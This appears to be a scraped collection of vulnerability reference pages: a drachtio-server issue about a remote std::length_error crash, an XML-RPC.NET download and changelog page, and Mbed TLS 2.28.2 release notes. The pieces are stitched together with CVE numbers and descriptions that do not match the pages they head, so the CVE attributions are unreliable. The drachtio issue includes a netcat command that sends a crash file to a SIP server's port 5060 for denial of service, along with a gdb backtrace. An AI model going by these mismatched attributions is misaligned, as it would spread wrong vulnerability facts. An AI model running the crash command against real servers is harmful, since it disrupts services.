id\_000027,sig\_11,src\_013544+002505,time\_31840218,execs\_68965869,op\_splice,rep\_16.zip

Any issue plz contact with me:  
asteriska001@gmail.com  
OR:  
twitter: @Asteriska8

CVE-2022-43289: A stack-buffer-overflow bug was discovered. · Issue #52 · jsummers/deark

An issue was discovered in drachtio-server before 0.8.20. It allows remote attackers to cause a denial of service (daemon crash) via a long message in a TCP request that leads to std::length_error.

Hi,

the following remote request is able to crash drachtio:

    nc -w 5 PUBLIC_IP 5060 < file
    
    terminate called after throwing an instance of 'std::length_error'
      what():  basic_string::_M_replace_aux
    Aborted
    

A bit of backtrace here:

    terminate called after throwing an instance of 'std::length_error'
      what():  basic_string::_M_replace_aux
    
    Thread 1 "drachtio" received signal SIGABRT, Aborted.
    0x00007ffff6cc9ce1 in raise () from /lib/x86_64-linux-gnu/libc.so.6
    (gdb) bt
    #0  0x00007ffff6cc9ce1 in raise () from /lib/x86_64-linux-gnu/libc.so.6
    #1  0x00007ffff6cb3537 in abort () from /lib/x86_64-linux-gnu/libc.so.6
    #2  0x00007ffff705e7ec in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #3  0x00007ffff7069966 in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #4  0x00007ffff70699d1 in std::terminate() () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #5  0x00007ffff7069c65 in __cxa_throw () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #6  0x00007ffff706109a in std::__throw_length_error(char const*) () from /lib/x86_64-linux-gnu/libstdc++.so.6
    #7  0x00007ffff70f82cf in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_replace_aux(unsigned long, unsigned long, unsigned long, char) ()
       from /lib/x86_64-linux-gnu/libstdc++.so.6
    #8  0x00000000004f10f5 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::resize (__n=<optimized out>, this=0x617000004418)
        at /usr/include/c++/10/bits/basic_string.h:940
    #9  drachtio::StackMsg::appendLine (szLine=<optimized out>, complete=true, this=0x617000004310) at ../src/controller.cpp:276
    #10 drachtio::StackMsg::appendLine (this=0x617000004310, szLine=<optimized out>, complete=<optimized out>) at ../src/controller.cpp:272
    #11 0x00000000004f4230 in (anonymous namespace)::__sofiasip_logger_func(void *, const char *, typedef __va_list_tag __va_list_tag *) (logarg=<optimized out>, 
        fmt=0xc27e40 "%s   ", '-' <repeats 72 times>, "\n", ap=0x7fffffffb4e0) at ../src/controller.cpp:132
    #12 0x00000000009f0304 in su_log (fmt=fmt@entry=0xc27e40 "%s   ", '-' <repeats 72 times>, "\n") at su_log.c:95
    #13 0x0000000000a30504 in tport_log_msg (self=self@entry=0x615000004e00, msg=msg@entry=0x619000011d80, what=what@entry=0xc24480 "recv", via=via@entry=0xc24440 "from", now=...)
        at tport_logging.c:901
    #14 0x0000000000a21d47 in tport_deliver (self=self@entry=0x615000004e00, msg=msg@entry=0x619000011d80, next=next@entry=0x0, sc=<optimized out>, now=...) at tport.c:3081
    #15 0x0000000000a224d0 in tport_parse (self=self@entry=0x615000004e00, complete=0, now=...) at tport.c:3015
    #16 0x0000000000a23ee0 in tport_recv_event (self=0x615000004e00) at tport.c:2954
    #17 0x0000000000a2a2e0 in tport_base_wakeup (self=0x615000004e00, events=1) at tport.c:2855
    #18 0x0000000000a83e3c in su_epoll_port_wait_events (self=0x611000001e40, tout=<optimized out>) at su_epoll_port.c:510
    #19 0x0000000000a82a45 in su_base_port_run (self=0x611000001e40) at su_base_port.c:349
    #20 0x00000000004dc07c in drachtio::DrachtioController::run (this=<optimized out>) at ../src/controller.cpp:1336
    #21 0x00000000004647af in main (argc=9, argv=0x7fffffffe898) at ../src/main.cpp:47
    

    # drachtio -v
    v0.8.20-rc1
    

Attaching the testcase as zipped, but to reproduce you need to unzip. No need to do replacements into the file, but please note that it is a tcp request and not udp like previous bugs.  
length\_error.zip

CVE-2022-47515: terminate called after throwing an instance of 'std::length_error' · Issue #245 · drachtio/drachtio-server

An XML external entity (XXE) injection vulnerability in XML-RPC.NET before 2.5.0 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks, as demonstrated by a pingback.aspx POST request.

**Downloads****Current Production Release**

XML-RPC.NET 2.5.0 is the current production release.

xml-rpc.net.2.5.0.zip      documentation

New features, changes, and fixed issues:

*   Added <i8> to support 64-bit long integer values.
*   Added support for more ISO8601 date formats. AllowNonStandardDateTime flag is now deprecated. The following formats are now accepted by default, with the '-' and ':' separators being optional.
    *   yyyy-mm-ddThh:mm:ss
    *   yyyy-mm-ddThh:mm:ssZ
    *   yyyy-mm-ddThh:mm:ss�hh
    *   yyyy-mm-ddThh:mm:ss�hh:mmNote: the XML-RPC spec describes the format as 19980717T14:08:55.
*   Added AllowAutoRedirect property to IXmlRpcProxy. Default behaviour remains the same (property set to true).
*   Moved to Visual Studio 2008.
*   Discontinued support for .NET 1.0 and 1.1.
*   Fixed issues:
    *   Issue 55 : change XmlRpcProxyGen so that FileIOPermission is not required for calls to Create.
    *   Issue 56: Maintain XML-RPC struct member ordering in XmlRpcStruct after deserialization.
    *   Issue 65: When deserializing request, check that the number of parameters is consistent with the method signature.
    *   Issue 70: Allow structs/classes to have members or arrays of the same type as the parent type.

**Work in Progress**

This is a snapshot of work in progress.

xml-rpc.net.3.0.0.270-snapshot.zip      documentation

**Build 270**

*   More graceful handling of case where illegal XML characters are rejected during serialization and deserialization.
*   Added generic EndInvoke method to XmlRpcClientProtocol so return type can be used for deserialization.
*   Added support for cookie and response headers for Silverlight and Windows Phone.

**Build 266**

*   Support for easier logging of request and response XML.
*   Support for mapping .NET enums to/from XML-RPC string values using XmlRpcEnumMapping attribute.
*   Fixed problem with logging and decompression of response stream.
*   Fixed problem with return type in XmlRpcClientProtocol.EndInvoke.
*   Added unit testing for Silverlight build.
*   Switch to Silverlight 4 only in order to support credentials using ClientHttp stack.
*   Now throws XmlRpcUnsupportedTypeException when a type has an indexer property.

**Build 241**

*   Fixes problem with mapping <nil /> onto type Object.

**Build 238**

*   Support for <nil> XML-RPC extension.
*   Support for Silverlight 3 and 4.
*   Support for Windows Phone 7.
*   .NET enum types can be mapped to/from XML-RPC <i4> and <i8> values. (more)
*   New UseEmptyElementTags property on IXmlRpcProxy. If this is set to true full element tags will be generated, for example <string></string> instead of <string />. The default setting of false for this property results is consistent with previous releases. This new feature provides compatibility with servers implemented with XML-RPC libraries which don't support empty tags, such XMLRPC++.
*   New UseNagleAlgorithm property on IXmlRpcProxy. With its default value of false calls will be quicker where small XML-RPC requests are being sent.
*   Separate client and server assemblies � client assembly compatible with .NET Client Profile.
*   Changed directory structure within distribution zip file to avoid problem when opening the file in Windows Explorer.
*   Moved to Visual Studio 2010.
*   Fixed issues:
    *   Issue 55 : change XmlRpcProxyGen so that FileIOPermission is not required for calls to Create.
    *   Issue 56: Maintain XML-RPC struct member ordering in XmlRpcStruct after deserialization.
    *   Issue 65: When deserializing request, check that the number of parameters is consistent with the method signature.
    *   Issue 70: Allow structs/classes to have members or arrays of the same type as the parent type.
    *   Issue 74: Fixed case where if a proxy call is made with a ResponseEvent assigned, the call crashes with a "Stream Closed" error.
    *   Issue 77: Fixed exception when AllowStringFaultCode is set to true. Now string fault codes are handled as well as integer fault code by default.
    *   Issue 78: XmlRpcServiceInfo.GetXmlRpcType now handles case of NonSerializedAttribute on all types.
    *   Issue 83: Change to prevent internal server error when viewing auto-generated help on Mono based servers.
    *   Issue 86: XmlRpcDocWriter.WriteStruct now writes XmlRpcMember.Description.
    *   Issue 89: Workaround on XmlRpcListenerService for cases where closing the request stream was resulting in an InvalidOperationException.
*   Changes:
    *   Custom nullable types � XmlRpcBoolean, XmlRpcDateTime, XmlRpcDouble, XmlRpcInt � have been discontinued. Use the standard nullable types bool?, DateTime?, double?, int?.
    *   A server implementation now needs to reference the CookComputing.XmlRpcServer assembly in addition to the CookComputing.XmlRpc assembly.
    *   Default value for new UseNagleAlgorithm. By default it was previously always false.

**Older Releases****2.4.0**

xml-rpc.net.2.4.0.zip

New feature and fixed issues:

*   New StructParams property on XmlRpcMethodAttribute which provides supports for APIs which use a struct to provide named parameters to a method call. (more).
*   NonSerialized attribute can be applied to struct members to prevent them being serialized and deserialized. (more).
*   Fixed issues:
    *   Issue 25: NullReferenceException when struct member name is an empty string. Now throws XmlRpcInvalidXmlRpcException.
    *   Issue 26: Auto-Documentation does not work with HttpListener.
    *   Issue 27: XmlRpcListenerService.ProcessRequest may not close stream in case of exception.
    *   Issue 28: XmlRpcSerializer.GetStructName does not check for Properties.
    *   Issue 31: UseIntTag is being ignored.
    *   Issue 32: XmlRpcClientProtocol problem with response from void method.
    *   Issue 34: XmlRpcServerProtocol should be derived from MarshalByRefObject. The system.\* methods do not work with remoting object.
    *   Issue 35: UseEmptyParamsTag property on the proxy doesn�t work unless you are making asynchronous calls.
    *   Issue 36: Fixed SelectSingleNode and using statement in XmlRpcFaultException for Compact Framework version.
    *   Issue 38: Check of ParamArrayAttribute causes crash under Mono/Linux.
    *   Issue 40: Deserialization performance enhancement.

**2.3.2**

xml-rpc.net.2.3.2.zip

Changes:

*   Issue 22: XmlRpcTypeMismatchException thrown if an XML-RPC array is mistakenly mapped onto a .Net struct (was throwing MissingMethodException).
*   Issue 23: Fixes problem where XML-RPC string values containing just one or more spaces were deserialized as an empty .Net string value.
*   Issue 24: XmlRpcV2 assembly is now built with a strong name.

**2.3.1**

xml-rpc.net.2.3.1.zip

Changes:

*   Issue 20: Fixes problem where XML-RPC service implemented as HttpHandler returns 500 server error.
*   Issue 21: Fixes problem with StateNameServer sample which returns fault response because of duplicate XML-RPC method names.

**2.3.0**

xml-rpc.net.2.3.0.zip

New features and changes:

*   Issue 15: Support for accessing response headers and cookies. (more).
*   Issue 17: Support for not sending a params element if no method parameters. (more).
*   Changes:
    *   Issue 16: Content type set before writing to response stream (fixes Mono issue).
    *   Issue 18: Modified proxy code generation so that it verifies - prevents �Operation could destabilize the runtime" problem.
    *   Issue 19: XmlRpcListenerService now sets Content Length header and does not use chunked content by default.

**2.2.0**

xml-rpc.net.2.2.0.zip

New features and changes:

*   Support for using System.Net.HttpListener to implement an XML-RPC server. (more).
*   Allow client to configure that <string> tag is not used for string values. (more).
*   Server configuration using XmlRpcServiceAttribute. (more).
*   Client support for Accept-Encoding - gzip and deflate. (more).
*   Changes:
    *   Fixed null exception if acquiring request stream fails while logging.
    *   Fixed stack overflow in GetXmlRpcType if invalid types such as DBNull passed in.
    *   Fixed handling of params method parameter if it is first parameter of method.
    *   Improved error reporting when processing params parameters.
    *   Throw XmlRpcDupXmlRpcMethodNames if same XML-RPC name applied to two methods.
    *   Handle zero offset timezones when AllowNonStandardDateTime flag set.

**2.1.0**

xml-rpc.net.2.1.0.zip

New features and changes:

*   Add support for proxy interfaces with overloaded methods. (more).
*   Add support for the int?, bool?, double?, and DateTime? nullable types to represent struct member types (.NET 2.0 version). These can be used to support optional struct members of int, boolean, double, and dateTime.iso8601 types. (more).

**2.0.0**

xml-rpc.net.2.0.0.zip

New features and changes:

*   Add generic form of XmlRpcProxyGen.Create() to remove need to cast the result of Create to the relevant interface (v2 assembly only) (more).
*   Add support for XmlRpcNonStandard.AllowInvalidHttpContent to handle HTTP response content which has whitespace before the start of the XML-RPC response (more).
*   Switch from NAnt to MSBuild and now builds a .NET 2.0 assembly as well as a .NET 1.0 assembly. Note that the 1.0 assembly can be used on all versions of the .NET runtime and should be used where backwards compatibility is required. The 2.0 assembly contains enhancements which rely on features of .NET 2.0 such as generics and can only be used on the .NET 2.0 and later versions of the runtime (more).
*   Error handling
    *   Throws XmlRpcInvalidParametersException if the parameters array passed to XmlRpcClientProtocol.Invoke contains more parameters than are defined for the method being invoked.
    *   Throws XmlRpcInvalidXmlRpcException if a struct member is missing its name or value child element or if it has a duplicate name or value child element.
    *   Attempt to serialize type with one or more properties that cannot be serialized to an XML-RPC type now results in the correct exception being thrown: XmlRpcUnsupportedTypeException.
*   Samples:
    *   Modify samples to use IXmlRpcProxy interface.
    *   Fix threading issue in AsyncBettyApplication sample.

**1.0.0**

xml-rpc.net.1.0.0.zip

New features and changes:

*   IXmlRpcProxy interface to simplify setting proxy properties (more).
*   Expect100Continue property on XmlRpcClientProtocol to configure "Expect: 100-continue" header; default is header not sent (more).
    *   Note: default behavior in previous versions of XML-RPC.NET was to send this header.
*   Support for variable number of method parameters using params (more).
*   Configurable client support for server which don't comply with XML-RPC standard:
    *   UseIntTag proxy property to use <int> instead of <i4>.
    *   Support dateTime with all zeroes (e.g. eGroupWare).
    *   Support empty dateTime values.
    *   Support fault code returned as string.
    *   Support for non-standard dateTime formats
    *   Note: default is standard XML-RPC only. Existing code which relies on non-standard behaviour will need to configure the proxy NonStandard property (more).
*   Support for sending cookies with request (thanks to JC Bertin) (more).
*   Changes:
    *   Fix for when passing zero-length byte array as base64 value.
    *   Removed large switch statements to circumvent Microsoft .NET bug when running in version 2.0 of the .NET runtime with medium trust.
    *   Uses invariant DateTimeFormatInfo when parsing dateTime.iso8601 so parsing works in all locales
    *   Check for recursive data structures when serializing.
    *   Fix to allow XmlRpcStruct member to be set more than once.
    *   Prevent types which cannot be serialized from being added to XmlRpcStruct.
    *   Improved error handling for null values when serializing.
    *   Fix to XmlRpcServerFormatterSink suggested by Sean Rohead.
*   Sample code:
    *   Updates on sample blogging interfaces from Sam Schillace and Mikahosi.
    *   Sample code for accessing OpenDHT (thanks to Michel Foucault).

**0.9.2**

xml-rpc.net.0.9.2.zip

*   Fixed parsing struct containing an enum member.
*   Lock around generation of proxy type.
*   When generating proxy from interface now includes methods from base interfaces.
*   Added RequestEvent and ResponseEvent events to XmlRpcClientProtocol.
*   Added XmlRpcLogger class for ease of use of RequestEvent and ResponseEvent events.
*   Adding LoggingEample sample.
*   Support for XmlRpcMissingMapping attribute on properties.
*   Invalid struct elements ignored if mapping action is Ignore.
*   Fixed dateTime issue with Wareki calendar.
*   Fixed problem with serializing void return.
*   Modified call to DeserializeResponse in DeserializeMessage.
*   Handles case when server incorrectly returns fault code as a string.
*   XmlRpcStruct restricted to string keys.

**0.9.1**

xml-rpc.net.0.9.1.zip

*   Distribution includes version of library which runs on .NET Compact Framework.
*   DateTime parsing bug fixed (caused problems in particular with it-IT locale)
*   XmlRpcProxyGen caches generated assemblies to avoid leakage if XmlRpcProxyGen is called multiple times for the same interface.

**0.9.0**

xml-rpc.net.0.9.0.zip

*   XmlRpcServiceAttribute has a new AutoDocumentation property which allows automatic documentation to be switched off.
*   Handles XML-RPC response encodings other than UTF-8.
*   XmlRpcMemberAttribute fixed.
*   XmlRpcClientProtocol has new ProtocolVersion property to allow HTTP v1.0 to be specified.
*   XmlRpcClientProtocol has new KeepAlive property (default is true). With some servers it may be necessary to set this to false when running with the current beta of the 2.0 CLR, for example if you start seeing the "Underlying Connection Was Closed" exception or the second call on a proxy appears to hang.
*   Multi-dimensional arrays handled correctly.
*   dateTime parsing supports "yyyy-MM-ddTHH:mm:ss" to handle blog service providers which return invalid XML-RPC dateTime values in this format.
*   Includes Joe Bork's xmlrpcgen utility to generate source code for proxies.
*   Release runs on version 1.0 of CLR upwards.

**0.8.0**

xml-rpc.net.0.8.0.zip

*   optional struct members
*   The zip file contains a bin directory containing:

*   **CookComputing.XmlRpc.dll**
*   **bettyapp.exe** (A WinForms application which calls the UserLand betty example server.)
*   **asyncbettyapp.exe** (Another WinForms app illustrating how to make async calls.)
*   **mathservice.exe** (A simple XML-RPC service.)
*   **mathapp.exe** (A WinForms application which calls MathService.)

**0.7.1**

xml-rpc.net.0.7.1.zip

*   License change.
*   Fixed problem in XmlRpcServerFormatterSink.cs whereby an exception was thrown if the XML-RPC and .NET method names are different.

**0.7.0**

xml-rpc.net.0.7.0.zip

*   error reporting of parsing errors using parse stack
*   support for async proxy method generation
*   contiuning work on auto-generated documentation
*   params keywords used in XmlRpcClientProtocol.Invoke
*   server method can return void (return empty string in XML-RPC response)
*   proxy method can return void (return value in XML-RPC response discarded)
*   deserializer throws exception if an XML-RPC struct is missing one or more expected members
*   fixed irritating warning when compiling XmlRpcStruct
*   add version of BeginInvoke taking correct params as per docs
*   Close always called on WebResponse
*   fixed usage of XmlRpcClientProtocol Proxy property when used in VS designer (Drew Marsh)
*   fixed handling of response without Content-Length during async calls (Dmitry Jemerov)
*   fixed case when zero-length string in default string value is passed as <value/> (Drew Marsh)
*   The zip file contains a bin directory containing:

*   **CookComputing.XmlRpc.dll**
*   **bettyapp.exe** (A WinForms application which calls the UserLand betty example server.)
*   **asyncbettyapp.exe** (Another WinForms app illustrating how to make async calls.)
*   **mathservice.exe** (A simple XML-RPC service.)
*   **mathapp.exe** (A WinForms application which calls MathService.)

**Limitations of Current Release**

*   Auto-documentation generation not fully implemented.
*   No tracing/logging functionality.

**0.6.0**

xml-rpc.net.0.6.0.zip

*   Fixed UserAgent property of XmlRpcClientProtocol.
*   Added Proxy property to XmlRpcClientProtocol.
*   Default for XML-RPC request XML document is no explicit encoding, i.e. implicitly UTF-8.
*   Added Encoding property to XmlRpcClientProtocol to set explicit encoding on XML-RPC request XML document
*   Can now use interface to define XML-RPC methods. For example can use same interface to implement both server and client. MathService changed to illustrate use of interface.
*   Added XmlRpcProxyGen class to dynamically create a proxy object from an interface, i.e. makes hand-coding of proxies unnecessary in most cases. bettyapp sample changed to illustrate this.
*   Fixed parsing of double type to be culture independent.
*   Fault response XML document now generated in same way as ordinary response, i.e. will be in same format and encoding.

**0.5.5**

xml-rpc.net.0.5.5.zip

*   Added ClientCertificates property to XmlRpcClientProtocol  
    
*   The zip file contains a bin directory containing:

*   **CookComputing.XmlRpc.dll**
*   **bettyapp.exe** (A WinForms application which calls the UserLand betty example server.)
*   **asyncbettyapp.exe** (Another WinForms app illustrating how to make async calls.)
*   **mathservice.exe** (A simple XML-RPC service.)
*   **mathapp.exe** (A WinForms application which calls MathService.)

**Limitations of Current Release  
**

*   Auto-documentation generation not fully implemented.
*   No tracing/logging functionality.

**0.5.4**

xml-rpc.net.0.5.4.zip

*   Added Headers property to XmlRpcClientProtocol.
*   Added XmlRpcMemberAttribute.
*   Modified deserialization of arrays to return more specific array type when all elements are of the same type.

**0.5.3**

xml-rpc.net.0.5.3.zip

*   Fixed problem with deserializing arrays.

**0.5.2**

xml-rpc.net.0.5.2.zip

*   Improved handling of XmlRpcFaultException in server formatter sink..

**0.5.1**

xml-rpc.net.0.5.1.zip

*   Improved handling of XmlRpcFaultException in server formatter sink..

**0.5.0**

xml-rpc.net.0.5.0.zip

*   Interim release containing preliminary code for client and server NET Remoting formatter sinks.
*   A Remoting sample, with assemblies and config files.

**0.4.3**

xml-rpc.net.0.4.3.zip

*   Interim release containing bug fixes, mainly in the serialization/deserialization code.
*   Some restructuring in preparation for some major changes in the 0.5 series of releases.

**0.4.2**

xml-rpc.net.0.4.2.zip

*   Build for .NET RTM.
*   Added preliminary support for Introspection API.

**0.4.1**

xml-rpc.net.0.4.1.zip

*   Major changes to XmlRpcClientProtocol class to support async calls, working but coding not completed.
*   Extra sample - AsyncBettyApp - to illustrate async calls.

**0.4.0**

Initial release for .NET beta 2.

xml-rpc.net.0.4.0.zip

**0.3.0**

Initial release for .NET beta 1.

**Developers**

Lead Developer - Charles Cook.

CVE-2022-47514: XML-RPC.Net - Downloads

An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. There is a potential heap-based buffer overflow and heap-based buffer over-read in DTLS if MBEDTLS_SSL_DTLS_CONNECTION_ID is enabled and MBEDTLS_SSL_CID_IN_LEN_MAX > 2 * MBEDTLS_SSL_CID_OUT_LEN_MAX.

**Description**

This release of Mbed TLS provides bug fixes and minor enhancements. This release includes fixes for security issues.

Mbed TLS 2.28 is a long-time support branch. It will be supported with bug-fixes and security fixes until end of 2024.

**Security Advisories**

There are no security advisories for this release.

**Release Notes**

Security

*   Fix potential heap buffer overread and overwrite in DTLS if  
    MBEDTLS\_SSL\_DTLS\_CONNECTION\_ID is enabled and  
    MBEDTLS\_SSL\_CID\_IN\_LEN\_MAX > 2 \* MBEDTLS\_SSL\_CID\_OUT\_LEN\_MAX.
*   An adversary with access to precise enough information about memory  
    accesses (typically, an untrusted operating system attacking a secure  
    enclave) could recover an RSA private key after observing the victim  
    performing a single private-key operation if the window size used for the  
    exponentiation was 3 or smaller. Found and reported by Zili KOU,  
    Wenjian HE, Sharad Sinha, and Wei ZHANG. See "Cache Side-channel Attacks  
    and Defenses of the Sliding Window Algorithm in TEEs" - Design, Automation  
    and Test in Europe 2023.

Bugfix

*   Fix a long-standing build failure when building x86 PIC code with old  
    gcc (4.x). The code will be slower, but will compile. We do however  
    recommend upgrading to a more recent compiler instead. Fixes #1910.
*   Fix support for little-endian Microblaze when MBEDTLS\_HAVE\_ASM is defined.  
    Contributed by Kazuyuki Kimura to fix #2020.
*   Use double quotes to include private header file psa\_crypto\_cipher.h.  
    Fixes 'file not found with include' error  
    when building with Xcode.
*   Fix handling of broken symlinks when loading certificates using  
    mbedtls\_x509\_crt\_parse\_path(). Instead of returning an error as soon as a  
    broken link is encountered, skip the broken link and continue parsing  
    other certificate files. Contributed by Eduardo Silva in #2602.
*   Fix a compilation error when using CMake with an IAR toolchain.  
    Fixes #5964.
*   Fix bugs and missing dependencies when building and testing  
    configurations with only one encryption type enabled in TLS 1.2.
*   Provide the missing definition of mbedtls\_setbuf() in some configurations  
    with MBEDTLS\_PLATFORM\_C disabled. Fixes #6118, #6196.
*   Fix compilation errors when trying to build with  
    PSA drivers for AEAD (GCM, CCM, Chacha20-Poly1305).
*   Fix memory leak in ssl\_parse\_certificate\_request() caused by  
    mbedtls\_x509\_get\_name() not freeing allocated objects in case of error.  
    Change mbedtls\_x509\_get\_name() to clean up allocated objects on error.
*   Fix checks on PK in check\_config.h for builds with PSA and RSA. This does  
    not change which builds actually work, only moving a link-time error to  
    an early check.
*   Fix ECDSA verification, where it was not always validating the  
    public key. This bug meant that it was possible to verify a  
    signature with an invalid public key, in some cases. Reported by  
    Guido Vranken using Cryptofuzz in #4420.
*   Fix a possible null pointer dereference if a memory allocation fails  
    in TLS PRF code. Reported by Michael Madsen in #6516.
*   Fix a bug in which mbedtls\_x509\_crt\_info() would produce non-printable  
    bytes when parsing certificates containing a binary RFC 4108  
    HardwareModuleName as a Subject Alternative Name extension. Hardware  
    serial numbers are now rendered in hex format. Fixes #6262.
*   Fix bug in error reporting in dh\_genprime.c where upon failure,  
    the error code returned by mbedtls\_mpi\_write\_file() is overwritten  
    and therefore not printed.
*   In the bignum module, operations of the form (-A) - (+A) or (-A) - (-A)  
    with A > 0 created an unintended representation of the value 0 which was  
    not processed correctly by some bignum operations. Fix this. This had no  
    consequence on cryptography code, but might affect applications that call  
    bignum directly and use negative numbers.
*   Fix undefined behavior (typically harmless in practice) of  
    mbedtls\_mpi\_add\_mpi(), mbedtls\_mpi\_add\_abs() and mbedtls\_mpi\_add\_int()  
    when both operands are 0 and the left operand is represented with 0 limbs.
*   Fix undefined behavior (typically harmless in practice) when some bignum  
    functions receive the most negative value of mbedtls\_mpi\_sint. Credit  
    to OSS-Fuzz. Fixes #6597.
*   Fix undefined behavior (typically harmless in practice) in PSA ECB  
    encryption and decryption.

**Who should update**

We recommend all users should update to take advantage of the bug fixes contained in this release at an appropriate point in their development lifecycle.

**Checksum**

The SHA256 hashes for the archives are:

bc55232bf71fd66045122ba9050a29ea7cb2e8f99b064a9e6334a82f715881a0 mbedtls-2.28.2.tar.gz  
4e4c4d5fd062dc29160edb916fb969878682221a142bda2be5db40e60125912c mbedtls-2.28.2.zip

Tag

#c++